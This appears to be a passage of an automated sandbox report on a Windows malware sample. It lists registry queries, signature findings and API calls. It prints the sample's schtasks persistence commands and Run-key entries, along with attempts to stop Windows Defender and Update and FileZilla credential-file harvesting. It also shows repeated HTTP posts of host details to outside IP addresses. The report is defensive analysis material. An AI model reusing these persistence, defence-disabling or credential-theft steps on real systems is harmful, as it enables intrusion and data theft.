RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: {90120000-0114-0412-0000-0000000FF1CE} base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: {d992c12e-cab2-426f-bde3-fb8c53950b0d} base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}	1
RegOpenKeyExW July 10, 2023, 6:13 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000002a8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW July 10, 2023, 6:13 p.m.	regkey_r: AddressBook base_handle: 0x000002a8 key_handle: 0x00000354 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW July 10, 2023, 6:13 p.m.	regkey_r: Connection Manager base_handle: 0x000002a8 key_handle: 0x00000354 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW July 10, 2023, 6:13 p.m.	regkey_r: DirectDrawEx base_handle: 0x000002a8 key_handle: 0x00000354 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW July 10, 2023, 6:13 p.m.	regkey_r: EditPlus base_handle: 0x000002a8 key_handle: 0x00000354 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW July 10, 2023, 6:13 p.m.	regkey_r: ENTERPRISE base_handle: 0x000002a8 key_handle: 0x00000354 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1
RegOpenKeyExW July 10, 2023, 6:13 p.m.	regkey_r: Fontcore base_handle: 0x000002a8 key_handle: 0x00000354 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW July 10, 2023, 6:13 p.m.	regkey_r: Google Chrome base_handle: 0x000002a8 key_handle: 0x00000354 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW July 10, 2023, 6:13 p.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x000002a8 key_handle: 0x00000354 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW July 10, 2023, 6:13 p.m.	regkey_r: IE40 base_handle: 0x000002a8 key_handle: 0x00000354 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW July 10, 2023, 6:13 p.m.	regkey_r: IE4Data base_handle: 0x000002a8 key_handle: 0x00000354 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	SELECT * FROM Win32_Processor

Communicates with host for which no DNS query was performed (3 events)

host	77.91.124.31
host	77.91.68.3
host	77.91.68.48

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Attempts to stop active services (2 events)

Time & API	Arguments	Status	Return	Repeated
ControlService July 10, 2023, 6:10 p.m.	service_handle: 0x005100d8 service_name: WinDefend control_code: 1		0	0
ControlService July 10, 2023, 6:10 p.m.	service_handle: 0x00510588 service_name: wuauserv control_code: 1		0	0

Installs itself for autorun at Windows startup (11 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\foto175.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000010051\foto175.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fotod45.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000011051\fotod45.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\du.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000012051\du.exe
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP003.TMP\"
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F

Detects Avast Antivirus through the presence of a library (2 events)

Time & API	Arguments	Status	Return	Repeated
LdrGetDllHandle July 10, 2023, 6:13 p.m.	module_name: snxhk module_address: 0x00000000 stack_pivoted: 0		3221225781	0
LdrGetDllHandle July 10, 2023, 6:13 p.m.	module_name: snxhk module_address: 0x00000000 stack_pivoted: 0		3221225781	0

Attempts to disable Windows Auto Updates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Executes one or more WMI queries (8 events)

wmi	SELECT * FROM AntivirusProduct
wmi	SELECT * FROM Win32_VideoController
wmi	SELECT * FROM Win32_OperatingSystem
wmi	SELECT * FROM Win32_Process Where SessionId='1'
wmi	SELECT * FROM AntiSpyWareProduct
wmi	SELECT * FROM FirewallProduct
wmi	SELECT * FROM Win32_DiskDrive
wmi	SELECT * FROM Win32_Processor

Collects information about installed applications (50 out of 54 events)

Time & API	Arguments	Status
RegQueryValueExW July 10, 2023, 6:10 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW July 10, 2023, 6:10 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExW July 10, 2023, 6:10 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW July 10, 2023, 6:10 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW July 10, 2023, 6:10 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:10 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:10 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:10 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:10 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:10 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:10 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:10 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:10 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:10 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:10 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:10 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:10 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:10 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:10 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:10 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:10 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:10 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:10 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:10 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:10 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:10 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:10 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:13 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW July 10, 2023, 6:13 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExW July 10, 2023, 6:13 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW July 10, 2023, 6:13 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW July 10, 2023, 6:13 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:13 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:13 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:13 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:13 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:13 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:13 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:13 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:13 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:13 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:13 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:13 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:13 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:13 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:13 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:13 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:13 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:13 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 10, 2023, 6:13 p.m.	key_handle: 0x00000354 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (12 events)

Time & API	Arguments	Status	Return
HttpSendRequestA July 10, 2023, 6:12 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.85&sd=de7e5a&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA July 10, 2023, 6:12 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.85&sd=de7e5a&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA July 10, 2023, 6:12 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.85&sd=de7e5a&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA July 10, 2023, 6:12 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.85&sd=de7e5a&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA July 10, 2023, 6:12 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.85&sd=de7e5a&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA July 10, 2023, 6:12 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.85&sd=de7e5a&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA July 10, 2023, 6:12 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.85&sd=de7e5a&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA July 10, 2023, 6:12 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.85&sd=de7e5a&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
